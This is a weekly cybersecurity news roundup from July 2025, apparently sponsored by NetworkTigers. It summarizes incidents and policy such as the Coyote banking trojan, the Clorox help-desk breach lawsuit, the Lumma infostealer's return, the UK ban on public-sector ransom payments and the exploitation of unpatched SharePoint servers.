San Mateo, CA, July 28, 2025 — Stories, events, and developments that impacted the cybersecurity landscape last week, including emerging threats, policy changes, and industry responses.
Trump pushes AI for infrastructure, downplays security concerns
The Trump administration’s AI Action Plan urges critical infrastructure sectors to adopt AI tools for cyber defense, while also acknowledging the technology’s vulnerabilities to hacking, data leaks, and manipulation. Emphasizing “secure by design” principles, the plan calls for resilient AI systems capable of detecting performance anomalies and cyberattacks, such as data poisoning. It also proposes a new AI threat-sharing hub under the DHS and asks NIST and CISA to update incident response protocols to include AI-specific roles. Daniel Bardenstein, a former CISA official and cyber strategist who led the agency’s AI Bill of Materials initiative, is critical of the plan’s safety. “The Action Plan talks about innovation, infrastructure, and diplomacy — but where’s the dedicated pillar for security and trust?… That’s a fundamental blind spot.” Privacy advocates warn that the deregulatory tone could fuel exploitative practices. Read more.
Arizona woman jailed for helping North Koreans land U.S. tech jobs
Christina Marie Chapman, an Arizona woman, was sentenced to over eight years in prison for aiding North Korean IT workers in infiltrating 309 U.S. companies through a massive identity fraud and money laundering scheme. Chapman hosted a laptop farm in her home, which was used to make it appear as though foreign workers were based in the U.S. According to the Justice Department, “Chapman also shipped 49 laptops and other devices supplied by U.S. companies to locations overseas, including multiple shipments to a city in China on the border with North Korea. More than 90 laptops were seized from Chapman’s home following the execution of a search warrant in October 2023.” The North Koreans she assisted obtained remote developer roles within major firms, including defense and tech companies, collecting more than $17 million in illicit payments. The operation, which also involved Ukrainian national Oleksandr Didenko and several unnamed foreign conspirators, relied on fake identities and fraud. Read more.
New Coyote malware exploits Windows UI for bank logins
A new variant of the Coyote banking trojan has become the first known malware to exploit Microsoft’s UI Automation (UIA) framework to steal financial credentials. Primarily targeting Brazilian users, Coyote uses UIA to scan UI elements from other applications, identifying login windows for banks and crypto platforms. Akamai’s Tomer Peled explained that if the malware doesn’t find a match via window title scanning, it uses UIA to dig through child UI elements, such as browser tabs or address bars, and cross-references them with a hard-coded target list. Initially revealed by Kaspersky in 2024, Coyote already possessed capabilities such as keylogging and screen capture; however, its new use of UIA grants it deeper access to sensitive data, mirroring the way Android trojans exploit accessibility services. Akamai noted that without UIA, accessing and parsing sub-elements from external apps is technically challenging, making this adaptation a potent step forward for attackers. “Coyote can perform checks regardless of whether the malware is online or operating in offline mode,” Akamai warned. Read more.
Clorox hack blamed on IT provider’s password giveaway
Bleach company Clorox has filed a lawsuit against IT services provider Cognizant, accusing the company of gross negligence in a 2023 cyberattack that caused $380 million in damages. According to the complaint filed in California, the Scattered Spider hacking group gained access to Clorox’s network by simply calling Cognizant’s help desk. “Cognizant was not duped by any elaborate ploy or sophisticated hacking techniques,” according to a copy of the lawsuit reviewed by Reuters. “The cybercriminal just called the Cognizant Service Desk, asked for credentials to access Clorox’s network, and Cognizant handed the credentials right over.” Clorox alleges that Cognizant failed to follow basic security procedures, including identity confirmation, deactivating compromised accounts, and restoring data properly during the recovery phase. The lawsuit includes transcripts of calls where hackers were allegedly given passwords with minimal resistance. The fallout from the breach severely disrupted Clorox’s operations, resulting in $50 million in remediation costs and a further loss of millions in sales. Read more.
Lumma malware resurfaces after global takedown
The Lumma infostealer malware-as-a-service platform is quickly rebounding after a May law enforcement takedown seized 2,300 domains and key parts of its infrastructure. While the operation disrupted Lumma’s operation, it didn’t dismantle it. Admins quickly acknowledged the action on underground forums, claiming the central server had been wiped but not seized. Analysts at Trend Micro report that Lumma’s activity is now nearly back to pre-seizure levels, with the introduction of new infrastructure and a return to a trusted status within the cybercriminal ecosystem. Lumma has also switched hosting providers, moving from Cloudflare to Russia-based Selectel to evade future takedowns. Researchers say this resurgence highlights the fact that law enforcement efforts alone are insufficient to dismantle financially motivated cybercrime networks. “Network telemetry indicates that Lumma’s infrastructure began ramping up again within weeks of the takedown,” Trend Micro confirmed. Read more.
Arizona blames CISA for weak response to election site hack
Arizona election officials say a pro-Iranian cyberattack defaced a statewide candidate portal, replacing multiple campaign photos with images of Ayatollah Ruhollah Khomeini. Investigators traced the breach to a Base64-encoded PowerShell script that was uploaded through a legacy portal, which was built without modern security controls. Although voter registration systems remain unaffected, the incident prompted Arizona officials to accuse the Cybersecurity and Infrastructure Security Agency (CISA) of abandoning its election security responsibilities under the Trump administration. State CISO Michael Moore and Secretary of State Adrian Fontes condemned CISA’s absence, saying that “up until 2024, CISA was a strong and reliable partner in our shared mission of securing American digital infrastructure, but since then, the agency has been politicized and weakened by the current administration.” Delays in alerts during the recent SharePoint vulnerability have been cited as further evidence of CISA’s lessened leadership. With CISA’s regional presence eroded and key staff members gone, states like Arizona say they’re now left to shoulder national cybersecurity burdens without the agency’s support. Read more.
U.K. to ban ransom payments by public sector and key services
The U.K. government is moving to prohibit public sector and critical infrastructure entities from paying ransoms following cyberattacks, to undercut the financial incentive that fuels ransomware gangs. Under the proposed legislation, organizations such as schools, local councils, and the NHS would be barred from making payments, with the government arguing the change would make “the vital services the public rely on a less attractive target for ransomware groups.” Security Minister Dan Jarvis stated that the U.K. is “determined to smash the cyber criminal business model.” Businesses outside the ban’s scope would be obligated to report ransom payments and consult with authorities on potential sanctions violations, particularly given the role of Russian-linked groups. A mandatory incident reporting system is also being developed to enhance law enforcement response. Read more.
Ransomware group uses AI chatbot in negotiations
A newly launched ransomware-as-a-service operation called GLOBAL GROUP is blending recycled malware infrastructure with AI-driven negotiation tactics. Unveiled by a threat actor known as $$$ on the RAMP forum, GLOBAL repackages elements from Mamona RIP and Black Lock, according to a forensic analysis by Picus Security. Its standout innovation is an AI chatbot embedded in the victim negotiation panel, which automates dialogue, applies psychological pressure, and facilitates round-the-clock extortion. The platform features cross-platform, Golang-based payloads, ChaCha20-Poly1305 encryption, and a modular builder that allows affiliates to customize attacks across various environments. Despite modern refinements like goroutine-driven concurrent encryption and filename scrambling, analysts identified code reuse and infrastructure overlaps with earlier strains, including mutex identifiers and exposed backend IPs linked to a Russian VPS provider. The AI-enhanced double-extortion approach enables GLOBAL to scale globally with minimal human oversight, reflecting a maturity of technique without advancing the underlying threat model. Read more.
Dell confirms breach by rebranded World Leaks extortion group
Dell has confirmed that its Customer Solution Centers were breached by a data extortion group calling itself “World Leaks.” The hackers accessed synthetic and non-sensitive demonstration data, along with an outdated contact list, according to Dell. The company said that the environment was isolated from customer systems and not used to deliver services, but did not disclose how the breach occurred or details of any ransom demands. World Leaks, a rebranded ransomware group that previously operated under the names Hunters International, has abandoned file encryption in favor of pure data theft. Since January 2025, the group has leaked data from 49 organizations via the gang’s custom exfiltration tool. It has been linked to previous attacks exploiting SonicWall SMA 100 devices with a rootkit dubbed OVERSTEP. Read more.
Hackers exploiting unpatched Microsoft SharePoint systems
Microsoft is facing renewed scrutiny over its security as hackers actively exploit critical vulnerabilities in SharePoint, its widely used document management platform, in what Censys researcher Silas Cutler called a “dream for ransomware operators.” CISA confirmed that the flaws are enabling attackers to execute code and access file systems on on-premise servers. Although Microsoft released a patch, experts warn that the threat persists, as more than 10,000 organizations globally are still running vulnerable configurations. Furthermore, Eye Security researchers revealed that attackers can maintain long-term access even after patches are applied. U.S. agencies, universities, and private companies are reportedly among those that have been compromised thus far. Read more.
More cybersecurity news
- Last week’s news
- More cybersecurity news
- All articles sponsored by NetworkTigers
About NetworkTigers
NetworkTigers is the leader in the secondary market for Grade A, seller-refurbished networking equipment. Founded in January 1996 as Andover Consulting Group, which built and re-architected data centers for Fortune 500 firms, NetworkTigers provides consulting and network equipment to global governmental agencies, Fortune 2000, and healthcare companies. www.networktigers.com.
